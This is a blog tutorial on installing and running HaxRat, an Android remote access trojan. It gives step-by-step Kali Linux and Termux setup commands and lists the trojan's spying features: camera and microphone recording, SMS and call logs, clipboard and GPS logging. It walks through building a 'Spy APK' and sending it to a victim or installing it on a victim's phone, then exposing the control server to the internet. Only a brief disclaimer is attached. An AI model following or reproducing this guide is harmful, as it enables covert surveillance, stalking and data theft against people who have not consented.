Posted by Previously we have featured an article on L3MON, HaxRat is based on L3MON but much more powerful then L3MON. It has some extra features like the screenshot, screen recording, front and rear camera recording. The Key features of HaxRat are the following:
Key Features of HaxRat
- Screenshot Capture.
- Screen Recorder.
- Rear Camera Recorder.
- Front Camera Recorder.
- Lock Device.
- GPS Logging.
- Microphone Recording.
- View Contacts.
- SMS Logs.
- Send SMS.
- Call Logs.
- View Installed Apps.
- View Stub Permissions.
- Live Clipboard Logging.
- Live Notification Logging.
- View WiFi Networks (logs previously seen).
- File Explorer & Downloader.
- Command Queuing.
- Built-In APK Builder.
We can easily install this suite on Linux, we also can install it on our Android phone by using Termux.
Installing HaxRat on Kali Linux
The installation process is the same as we did in our L3MON tutorial. We have a detailed discussion on our that post So we are not going to explain the commands.
First, we install JRE in Kali by using the following command:
sudo apt-get install openjdk-8-jreThen we download NodeJs in our system by applying the following command:
curl -sL https://deb.nodesource.com/setup_13.x | sudo bash -Now we install NodeJs by preceding following command:
sudo apt-get install -y nodejsNow we need pm2 process manager to install this we use the following command:
sudo npm install pm2 -gNow we clone haxRat from it’s GitHub repository by using the following command:
git clone https://github.com/Hax4us/haxRatThen we navigate to the server directory under haxRat by using cd command:
cd /haxRat/serverThen we need to install dependencies by using the following command:
npm installThen we start the server by using the following command:
node index.jsNow we can see our server in our browser http://localhost:22533 there will be a login page like the following screenshot:
Now we stop this server by using CTRL+C command. Now, what to do? Login? But where are the credentials? We have talked before how to create a custom credential on our older L3MON tutorial. Otherwise check the haxRat GitHub repository for default credentials.
After login we can see the main page as shown in the following screenshot:
Now we go to the APK Builder page and give our local IP address and click on build.
If a got error like “Wrong java Version installed…..” this when building APK then try the following command:
sudo update-alternatives --config javaThen we type 2 and enter.
Then we stop our running haxRat server by CTRL+C and start it again this problem will be solved.
Now we can build Spy APK and send it to the victim, whenever the victim installs it and grant the permission. Or if we got a victim’s phone in hand then we can implement this.
We got the victim in our haxRat dashboard like the following screenshot:
Now in the manage section, we can manage the Android device totally. Magics will start from here.
 |
| Installed Android Apps |
 |
| File Manager |
 |
| Recording from front Camera |
Installing HaxRat on Android (using Termux)
This is easy to install in Termux. We try following commands one after another to install and configure haxRat.
apt install nodejs
git clone https://github.com/hax4us/haxRat.git
cd haxRat/servernpm installmkdir ~/haxrat
haxratnode index.jsIn our browser, we navigate to Http://<Local IP>:22533 and we will be the login screen of haxRat.
This is how we can start the haxrat server and take control of any android device on our local network. We also can run this on a wide network or internet by using PortMap service.
Disclaimer
Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool or this tutorial.
HaxRat is built and our article is documented for both Educational and Internal use ONLY.
Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.
Spyboy blog 